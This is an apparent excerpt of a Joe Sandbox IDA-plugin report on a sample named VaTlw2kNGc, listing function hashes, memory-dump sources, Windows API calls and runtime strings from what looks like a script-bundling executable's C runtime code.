                                                                                                    • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                    • Instruction Fuzzy Hash: D041A221B19A02C1EB19EF16B800675A3B6BF45BA0FB84135DD1E97788EE3CE505C7A0
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD06D
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD07B
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD0A5
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD113
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD11F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                    • Instruction ID: d8f3b35796722d8ffef25c0141a0ed9c9db71d75a2e66361af65beb86ee0bc11
                                                                                                    • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                    • Instruction Fuzzy Hash: 2131A325A1AA42C5EE19AF12B500579A3B4BF09BA0FB90536DD1D47B80EF3CE846C724
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                    • Instruction ID: ed425afdaccad30083c56d0d0ae6538f45896da75e2566c2c7e2e7f69b4c8335
                                                                                                    • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                    • Instruction Fuzzy Hash: DD213820B4C242C2FA6D7F25B655139E1B35F487B0FB84634E93E46AEEDE2CA5018761
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                    • Instruction ID: 6af52981b5bd93c833f5eb161950a0489024dd7193d3ad3be74a19d3c06ac08f
                                                                                                    • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                    • Instruction Fuzzy Hash: AD118421A18A41C6E7549F12F844329E2B4FB58BE5FA00234DA1E87794DF7CE514CB50
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA5E7
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA61D
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA64A
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA65B
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA66C
                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA687
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                    • Instruction ID: 57b9157a358bfd0d0d490d7e3e87ab0247492faeb7a1024bb74bf51c514f99b9
                                                                                                    • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                                    • Instruction Fuzzy Hash: B4113860B48242C2FA5C7F25B651139E2A39F487B0FE44734D83E066EADE2CB5018721
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                    • String ID: Unhandled exception in script
                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                    • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                    • Instruction ID: 7c90c80c26d2125f04316e98079a1f0a0b782f63b25dc51a241941874907bbbd
                                                                                                    • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                    • Instruction Fuzzy Hash: 34313D32A09A86C9EB28AF61F8552F9A370FF88794F940135EA4D47B59DF3CD505C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                    • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                    • API String ID: 1878133881-640379615
                                                                                                    • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                    • Instruction ID: 709f9a6250ef0c4ef748471060b9daa144d28ff9e2375aa63cf738b83d15f031
                                                                                                    • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                    • Instruction Fuzzy Hash: 83216B72628AC6C2E624AF10F4517EAA374FF84784F905136EA8C43A99DF3CD646CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                    • Instruction ID: 3f23797772a02f4b2cd3ab0a2a3c6c4da112c766718274bdefd701c5b0b3b59e
                                                                                                    • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                    • Instruction Fuzzy Hash: 52F06221B19702C2EA18AF24F4443799330AF49B61FE40636C96E862F4CF2CD04AC720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction ID: 405a8a5d5e02646b90e43f1e3faac176237b74da9f324872e234f4bdb685bbe3
                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction Fuzzy Hash: E711BF36E18A13C3F65C3928F5D637982606F54364FF506B4F96F066E69F2CA8429A30
                                                                                                    APIs
                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6BF
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6DE
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA706
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA717
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA728
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                    • Instruction ID: dd1ff62f630595b6a1cc1e96c42a5fd051ec86a089b1ff38ba40a3f1b78b23b4
                                                                                                    • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                    • Instruction Fuzzy Hash: A7113D21B0C242C2FA5C7B25B551579E1B35F983B0EF84334E83E466EEDE2DA9428761
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                    • Instruction ID: 795eb78e52bd79cd74cd2637bde607f4aa409ca3a859816f0aa11aec20b55fc2
                                                                                                    • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                    • Instruction Fuzzy Hash: 5711FA20F48207C2FA6C7F25B451579E2A34F59370EF84734D93E0A2DAED2CB6414271
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: verbose
                                                                                                    • API String ID: 3215553584-579935070
                                                                                                    • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                    • Instruction ID: 4a0b4dc2d2050787467cca40af6be64adb799304cdf4baca05cb52d3f47d8e20
                                                                                                    • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                    • Instruction Fuzzy Hash: E591B022A0C646C1F76AAF25F45037DB6B2AB04B95FE84136DA5D873D9EE3CE4458320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                    • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                    • Instruction ID: 6bd6da0e4784cef727a130e93b34c6c758fbe33866e409389363374781674e55
                                                                                                    • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                    • Instruction Fuzzy Hash: E481A37AE08203C5F76C7E29E110278B6B3AB11744FF58035DA1A973EDDB2DE905A721
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                    • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                    • Instruction ID: 7ef9ab6b6f7882665af7288478547980de27fb17c7de2eb67ba06ad4590e9d90
                                                                                                    • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                    • Instruction Fuzzy Hash: CC518F32B19642CADF18EF25F444A79B7A1EB44B98FA08131DA5A43B85EF7DEC41C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                    • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                    • Instruction ID: 4f38563176fc62fbed1f6174cea3b9c63a93e835aa5724d0496b833194f72920
                                                                                                    • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                    • Instruction Fuzzy Hash: 21618E32908B85C6EB25AF25F4403AAB7B4FB84784F544225EB9C43B95DF7CE594CB10
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                    • String ID: csm$csm
                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                    • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                    • Instruction ID: 65391e38177a33de5bf5207e9f817f474d889efe7845a00e2f09b942252b0d89
                                                                                                    • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                    • Instruction Fuzzy Hash: 2B51A136A08642CAEB68AF61A048378B7B0EB54B94FA44536DA5D43FD1CF3CED50CB51
                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF7691A324C,?,?,00007FF7691A3964), ref: 00007FF7691A7642
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory
                                                                                                    • String ID: %.*s$%s%c$\
                                                                                                    • API String ID: 4241100979-1685191245
                                                                                                    • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                    • Instruction ID: f81caa457b8c00a6ea6cdb965cf09d026ac504dd434ae85c9ba9068ab4a59568
                                                                                                    • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                    • Instruction Fuzzy Hash: 0F31B821B19AC5C9FA25AF15F8107A6A274FB44BE0FE44231EA6D43BC9DE2CDA458710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
